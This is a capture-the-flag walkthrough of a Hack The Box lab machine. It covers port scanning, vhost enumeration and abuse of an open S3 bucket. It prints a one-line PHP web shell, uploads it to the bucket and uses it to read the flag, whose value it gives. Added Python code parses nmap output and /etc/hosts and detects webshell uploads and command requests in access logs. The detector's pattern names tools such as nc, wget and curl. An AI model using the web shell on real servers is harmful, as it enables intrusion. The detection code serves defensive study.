Three
Task #1: How many TCP ports are open?
- A: 2
- nmap -sC -sV -p- -T5 -v 10.129.202.49
$ nmap -sC -sV -p- -T5 -vv 10.129.202.49
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 15:18 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Initiating Ping Scan at 15:18
Scanning 10.129.202.49 [2 ports]
Completed Ping Scan at 15:18, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:18
Completed Parallel DNS resolution of 1 host. at 15:18, 0.01s elapsed
Initiating Connect Scan at 15:18
Scanning 10.129.202.49 [65535 ports]
Discovered open port 22/tcp on 10.129.202.49
Discovered open port 80/tcp on 10.129.202.49
Warning: 10.129.202.49 giving up on port because retransmission cap hit (2).
Completed Connect Scan at 15:18, 11.89s elapsed (65535 total ports)
Initiating Service scan at 15:18
Scanning 2 services on 10.129.202.49
Completed Service scan at 15:18, 6.28s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.202.49.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 3.39s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.48s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Nmap scan report for 10.129.202.49
Host is up, received conn-refused (0.016s latency).
Scanned at 2022-12-13 15:18:09 EST for 22s
Not shown: 60242 closed ports, 5291 filtered ports
Reason: 60242 conn-refused and 5291 no-responses
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf
|   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI=
|   256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Toppers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.69 seconds
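Counting open ports by eye works for two services, but the same question comes up on every scan, so here is an added example (not part of this writeup) in Python: a small parser for nmap's normal output that returns the open TCP ports with their service and version strings, and checks that the listed ports plus the "Not shown" counts add up to all 65535 ports, which confirms the -p- sweep was complete. The sample output inside the block is constructed to mirror the scan above; one closed-port line was added and the "Not shown" counts adjusted so the arithmetic covers the whole range.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in nmap "normal" output format (same layout as the scan above,
# run with -vv so the REASON column is present). A closed-port line was added and
# the "Not shown" counts adjusted so that listed + not-shown ports total 65535.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.129.202.49
Host is up, received conn-refused (0.016s latency).
Not shown: 60241 closed ports, 5291 filtered ports
PORT    STATE  SERVICE REASON       VERSION
22/tcp  open   ssh     syn-ack      OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
80/tcp  open   http    syn-ack      Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
443/tcp closed https   conn-refused
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One row of the PORT table; NSE script lines start with "|" and never match.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<rest>.*))?$"
)
NOT_SHOWN = re.compile(r"(\d+) (open\|filtered|closed\|filtered|open|closed|filtered) ports?")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    reason: str   # empty when the scan ran without -vv/--reason
    version: str  # empty when -sV had nothing to report


def parse_nmap_ports(text: str) -> List[PortRecord]:
    """Parse the PORT table of nmap normal output, ignoring NSE script lines."""
    records: List[PortRecord] = []
    has_reason = False
    for line in text.splitlines():
        if line.startswith("PORT "):
            # The header tells us whether a REASON column sits before VERSION.
            has_reason = "REASON" in line.split()
            continue
        m = PORT_LINE.match(line)
        if m is None:
            continue  # "| script output", host banner, summary lines
        rest = (m.group("rest") or "").strip()
        reason, version = "", rest
        if has_reason and rest:
            head, _, tail = rest.partition(" ")
            reason, version = head, tail.strip()
        records.append(PortRecord(int(m.group("port")), m.group("proto"),
                                  m.group("state"), m.group("service"), reason, version))
    return records


def open_tcp_ports(text: str) -> List[int]:
    return sorted(r.port for r in parse_nmap_ports(text)
                  if r.proto == "tcp" and r.state == "open")


def count_open_tcp_ports(text: str) -> int:
    return len(open_tcp_ports(text))


def not_shown_counts(text: str) -> Dict[str, int]:
    """Turn 'Not shown: N closed ports, M filtered ports' into {state: count}."""
    for line in text.splitlines():
        if line.startswith("Not shown:"):
            return {state: int(n) for n, state in NOT_SHOWN.findall(line)}
    return {}


def total_ports_accounted(text: str) -> int:
    """Listed ports plus 'Not shown' ports; 65535 confirms a complete -p- TCP sweep."""
    return len(parse_nmap_ports(text)) + sum(not_shown_counts(text).values())


if __name__ == "__main__":
    print(count_open_tcp_ports(SAMPLE_NMAP_OUTPUT), "open TCP ports:", open_tcp_ports(SAMPLE_NMAP_OUTPUT))
    for rec in parse_nmap_ports(SAMPLE_NMAP_OUTPUT):
        print(f"{rec.port}/{rec.proto} {rec.state} {rec.service} {rec.version}")
    print("ports accounted for:", total_ports_accounted(SAMPLE_NMAP_OUTPUT))
```

The header check matters: without -vv or --reason nmap omits the REASON column, and a parser that assumes it would swallow the first word of every version string as the reason.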
Task #2: What is the domain of the email address provided in the "Contact" section of the website?
- A: thetoppers.htb
Task #3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
- A: /etc/hosts
Task #4: Which sub-domain is discovered during further enumeration?
- A: s3.thetoppers.htb
- Add the line 10.129.202.49 thetoppers.htb to /etc/hosts
- gobuster vhost -u thetoppers.htb -w subdomains.txt
Task #5: Which service is running on the discovered sub-domain?
- A: Amazon S3
- Add s3.thetoppers.htb to /etc/hosts as well
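Tasks 3 to 5 all turn on how /etc/hosts works: one IP can carry several hostnames, and the web server picks the virtual host from the Host header, so the names have to resolve locally before the browser or gobuster can reach them. As an added example (not from this writeup), the Python below parses the hosts file format the way the glibc files backend does: strip "#" comments, take the first field as the address, treat every remaining field as a hostname, and let the first matching line win. The file content is constructed for the example and includes the two entries added above.

```python
import ipaddress
from typing import Dict, List, Optional

# Constructed /etc/hosts content for the example (not a real file from the box),
# with the two lab entries added in tasks 4 and 5 on one line sharing the target IP.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost ip6-loopback
# HTB target: several name-based virtual hosts are served from a single IP
10.129.202.49   thetoppers.htb  s3.thetoppers.htb   # added for the lab
"""


def parse_hosts(text: str) -> Dict[str, str]:
    """Return {hostname_lower: ip}. Comments are dropped, the first entry for a name wins."""
    table: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # anything after '#' is a comment
        if not line:
            continue
        fields = line.split()
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue                            # malformed line: the resolver ignores it
        for name in fields[1:]:
            table.setdefault(name.lower(), ip)  # first match wins, as in glibc's files backend


    return table


def resolve(hostname: str, hosts_text: str) -> Optional[str]:
    """Hostname lookup is case-insensitive; a trailing dot is ignored."""
    return parse_hosts(hosts_text).get(hostname.rstrip(".").lower())


def names_for(ip: str, hosts_text: str) -> List[str]:
    """Reverse view: which names share one address (the virtual-host situation)."""
    return sorted(n for n, a in parse_hosts(hosts_text).items() if a == ip)


if __name__ == "__main__":
    for name in ("thetoppers.htb", "S3.thetoppers.htb", "localhost", "missing.htb"):
        print(f"{name:20} -> {resolve(name, SAMPLE_HOSTS)}")
    print("names on 10.129.202.49:", names_for("10.129.202.49", SAMPLE_HOSTS))
```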
Task #6: Which command line utility can be used to interact with the service running on the discovered sub-domain?
- A: awscli
Task #7: Which command is used to set up the AWS CLI installation?
- A: aws configure
- Install it first with sudo apt install awscli
Task #8: What is the command used by the above utility to list all of the S3 buckets?
- A: aws s3 ls
- Enter some random values for the access key and secret key so the commands will run
Task #9: This server is configured to run files written in what web scripting language?
- A: PHP
Root flag: a980d99281a28d638ac68b9bf9453c2b
- aws --endpoint http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
  shows us an .htaccess file and an index.php file
- Create a PHP payload to run commands with
  echo '<?php system($_GET["cmd"]); ?>' > shell.php
  Then upload it to the bucket with
  aws --endpoint http://s3.thetoppers.htb/ s3 cp shell.php s3://thetoppers.htb
- Run the ls command through the uploaded shell to test. It works, so try running ls ../ to see the next directory up. That shows a flag.txt file, which we can view with cat ../flag.txt
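Seen from the server side, the chain above leaves two distinct traces: a PUT of a .php object on the S3 virtual host, followed by GET requests to that same file name carrying a command in the query string. As an added example (not part of this writeup), the Python below runs that detection over Apache vhost_combined access-log lines: it flags .php uploads, flags .php requests whose parameters look like shell commands, and raises the severity when the requested file is one it earlier saw uploaded. The log lines, client addresses and the /contact.php and /images/band.jpg paths are constructed for the example; the correlation by basename is a heuristic, since the bucket path and the web path differ.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "vhost_combined" access-log lines (not from the box), modelled on the
# sequence in the writeup: a .php object is PUT to the S3 vhost, then requested with cmd=.
SAMPLE_ACCESS_LOG = """\
thetoppers.htb:80 10.10.14.5 - - [13/Dec/2022:15:30:11 -0500] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
s3.thetoppers.htb:80 10.10.14.5 - - [13/Dec/2022:15:41:02 -0500] "PUT /thetoppers.htb/shell.php HTTP/1.1" 200 0 "-" "aws-cli/1.22.34"
thetoppers.htb:80 10.10.14.5 - - [13/Dec/2022:15:41:30 -0500] "GET /shell.php?cmd=ls HTTP/1.1" 200 97 "-" "curl/7.85.0"
thetoppers.htb:80 10.10.14.5 - - [13/Dec/2022:15:41:45 -0500] "GET /shell.php?cmd=cat%20../flag.txt HTTP/1.1" 200 33 "-" "curl/7.85.0"
thetoppers.htb:80 10.10.14.9 - - [13/Dec/2022:15:42:00 -0500] "GET /images/band.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
thetoppers.htb:80 10.10.14.9 - - [13/Dec/2022:15:42:05 -0500] "POST /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# vhost_combined: "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\""
LOG_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<port>\d+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter names typical of one-line PHP shells, and values that read like a command.
SUSPECT_PARAMS = {"cmd", "exec", "command", "shell", "run"}
SHELL_VALUE = re.compile(r"^\s*(ls|cat|id|whoami|uname|pwd|wget|curl|bash|sh|nc|python3?)\b|[;|`$&]")


def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text: str):
    """Return (line_no, kind, detail) findings for PHP uploads and webshell-style requests."""
    findings = []
    uploaded_php = set()  # basenames written via PUT; later correlated by basename (heuristic)
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        basename = parts.path.rsplit("/", 1)[-1].lower()
        if not basename.endswith(".php"):
            continue
        if rec["method"] == "PUT":
            # A .php object accepted by an upload endpoint (here the S3-style vhost).
            uploaded_php.add(basename)
            findings.append((n, "php_upload", f"PUT {parts.path} from {rec['ip']}"))
            continue
        for key, values in parse_qs(parts.query, keep_blank_values=True).items():
            if key.lower() in SUSPECT_PARAMS or any(SHELL_VALUE.search(v) for v in values):
                kind = "uploaded_webshell_exec" if basename in uploaded_php else "webshell_exec"
                findings.append((n, kind, f"{key}={values[0]!r} on {parts.path} from {rec['ip']}"))
                break
    return findings


if __name__ == "__main__":
    for line_no, kind, detail in analyse(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: {kind}: {detail}")
```

The upload rule is the higher-value one for prevention: a bucket or upload endpoint that accepts .php objects into a directory the web server executes is the misconfiguration, and the webshell requests are only its consequence.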